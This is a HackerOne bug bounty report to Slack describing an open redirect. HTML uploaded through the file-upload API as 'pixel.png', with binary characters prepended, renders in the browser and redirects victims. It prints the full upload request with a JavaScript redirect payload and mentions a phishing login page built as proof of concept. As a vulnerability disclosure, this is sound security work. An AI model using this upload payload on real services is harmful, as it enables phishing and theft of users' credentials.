Slack: Open Redirect on

ID H1:140447
Type hackerone
Reporter sudotop
Modified 2016-10-02T18:09:42


Hi, my report has tow interesting parts here First ====== In this report #104087 the attacker uploads a svg file to execute JavaScript and redirect to any domain I have found a new way to execute full html files on victim machine instead of downloading them by adding a bunch of binary chars before html code

Please have a look at screenshots attached here to get what I mean.


  1. login to your account and send the following request:

Note: I can't get binary chars displayed here so I attached a file containing the whole request

``` POST /api/files.uploadAsync HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 886 Content-Type: multipart/form-data; boundary=---------------------------89481407720596 Origin: https://<subdomain> Connection: keep-alive

-----------------------------89481407720596 Content-Disposition: form-data; name="file"; filename="pixel.png" Content-Type: text/html

<bunch_of_binary_chars_here> <html> <script> window.location=''; </script> </html> -----------------------------89481407720596 Content-Disposition: form-data; name="filename"

pixel -----------------------------89481407720596 Content-Disposition: form-data; name="token"

<token> -----------------------------89481407720596 Content-Disposition: form-data; name="channels"

<channels> -----------------------------89481407720596 Content-Disposition: form-data; name="title"

pixel -----------------------------89481407720596 Content-Disposition: form-data; name="initial_comment"

hi -----------------------------89481407720596--


  1. Make public link for "pixel" file ""

  2. Complete link ""

  3. Whenever a victim clicks the previous link he will get to ""


I have found another way to make the redirect link very simple and more tricky The attacker can just use slack main domain using this link "" to redirect victims to "".

There are many other attack scenarios can be achieved here cause the attacker has full control over file content and name also.

Here is a simple phishing login page I have created as PoC that could trick even advanced users to submit their credentials to the attacker ""

Attacker could do tons of fun stuff to the files, to my mind come Viruses, Exploits, Illegal Content, etc.